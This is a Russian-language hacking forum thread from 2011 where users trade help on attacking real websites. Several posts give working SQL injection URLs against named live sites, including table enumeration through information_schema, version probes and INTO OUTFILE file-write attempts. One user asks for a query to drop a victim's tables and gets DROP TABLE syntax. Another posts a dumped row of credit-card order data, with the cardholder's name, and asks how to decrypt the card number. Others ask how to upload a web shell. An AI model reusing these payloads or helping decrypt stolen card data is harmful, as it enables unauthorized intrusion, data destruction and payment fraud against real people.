Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 3aHyga

    3aHyga New Member

    Joined:
    8 Jun 2011
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    я делаю любой запрос меня перегидывает
    когда я делаю такой запрос +union+select+1,@@version,2,3,4,5,6+--+
    даны показываются остальные запросы не работают
     
  2. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    На сайте стоит фильтр на точку и скобки, на остальное не тестил.
     
  3. KosoyRoman

    KosoyRoman Banned

    Joined:
    14 Sep 2008
    Messages:
    51
    Likes Received:
    12
    Reputations:
    -5
    Кто знает как залить шелл через CNStats STD 3.0
     
  4. 3aHyga

    3aHyga New Member

    Joined:
    8 Jun 2011
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    Подскажите пожалуйста. Чем расшифровывается вот этот код
    Code:
    01:6B:17:69:24:CC:5B:D1:5E:A0:2F:53:3A:5D:BD:72:DB
     
    #17024 3aHyga, 11 Jun 2011
    Last edited: 11 Jun 2011
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    вроде масив HEX'a:
    ki$Ì[Ñ^*/S:]½rÛ
     
    _________________________
  6. 3aHyga

    3aHyga New Member

    Joined:
    8 Jun 2011
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    я думаю не hex, так как расшифрованные данные должны быть исключительно в цифрах
    вот болия полноя инфа
    Code:
     cc	                                                 nameonca  typeofcard	id  order_list_id  expmm	expyy	       total	timeofcharge	      status	        purchaseid 
    
    [COLOR=Red]01:6B:17:69:24:CC:5B:D1:5E:A0:2F:53:3A:5D:BD:72:DB[/COLOR]	Keith Stewart	Visa	68	69	[COLOR=Red]1A:46:8B[/COLOR]	[COLOR=Red]11:F6:FB[/COLOR]	55.98	1257444668	Waiting to charge	PFP7153633
     
    #17026 3aHyga, 11 Jun 2011
    Last edited: 11 Jun 2011
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    если есть доступ к исходникам, то там можно посмотреть каким алгоритмом захешированные данные...
     
    _________________________
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Объясните плиз, почему так вывод есть,
    http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=0+union+select+1+--+
    а так нет?
    http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=(0)union(select(1))+--+
     
  9. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    как вычислить на чем стоит локалка (ОСь)
     
  10. MrGergez

    MrGergez New Member

    Joined:
    11 Jun 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Почитал FAQ про использование инъекций для получения пользователя, но вот столкнулся с проблемой в таблицах ничего интересного, решил дропнуть таблицы, но вот в чем проблема как построить запрос на удаление таблиц? Нигде не нашел хотя бы примеров...
     
  11. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    DROP TABLE "table_name"
    только зачем!?
     
    #17031 d1v, 11 Jun 2011
    Last edited: 11 Jun 2011
  12. MrGergez

    MrGergez New Member

    Joined:
    11 Jun 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Тренировка и практика еще никому не мешали
     
  13. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    тренируйся на кошках (с)
     
    2 people like this.
  14. MrGergez

    MrGergez New Member

    Joined:
    11 Jun 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Но если не трудно можете показать на примере вот здесь список таблиц

    http://www.stromgren.com/products.php?id=22+and+1=0+union+select+group_concat(table_name+separator+0x3a)+from+information_schema.tables+where+table_schema=0x73776173696e676572--
     
  15. MrGergez

    MrGergez New Member

    Joined:
    11 Jun 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    А меня склоняло к мысли о TRUNCATE
     
  16. SecondLife

    SecondLife Elder - Старейшина

    Joined:
    8 May 2011
    Messages:
    30
    Likes Received:
    21
    Reputations:
    21
    Есть скрипт с отсутствием фильтрации в вызове функции readfile. С помощью этой уязвимости утянул исходники, но больше в них зацепиться не за что: нет инъекций, нет упоминаний админки (да и я не уверен, что она вообще существует), нет L/RFI, XSS, аворизации, системы прав, заливки файлов. Вообще ничего интересного кроме readfile. Можно ли вытянуть из этого что-то полезное?
    Интересует заливка шелла.
    Директивы open_basedir нет, однако (видимо из-за прав) получить файл httpd.conf не получилось.
    Сайт лежит на VPS. Сайтов на сервере несколько, однако к одному IP привязан только один домен, так что через поиск сайтов по IP ничего узнать не вышло. Удалось установить наличие ещё одного сайта со своим собственным IP, однако и в его исходниках нет ничего интересного.
    Есть доступ к phpinfo и некоторым файлам конфигурации.

    Что можете подсказать?
     
  17. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Ты линк выложи, а мы посмотрим.
     
  18. SecondLife

    SecondLife Elder - Старейшина

    Joined:
    8 May 2011
    Messages:
    30
    Likes Received:
    21
    Reputations:
    21
    Как-нибудь в другой раз. Здесь смотреть особо не на что, всю доступную инфу я озвучил, интересует направления, в которых думать дальше.
     
  19. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    delete
     
    #17039 mix0x0, 12 Jun 2011
    Last edited: 12 Jun 2011
  20. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    129
    Likes Received:
    33
    Reputations:
    8
    Подскажите любой рабочий способ узнать путь к файлу?
    в чем тут ошибка?
    ?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e747874 --
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1
    ?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' --
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'/tmp/lol.txt -- ORDER BY rel_id DESC LIMIT 5' at line 1
     
Thread Status:
Not open for further replies.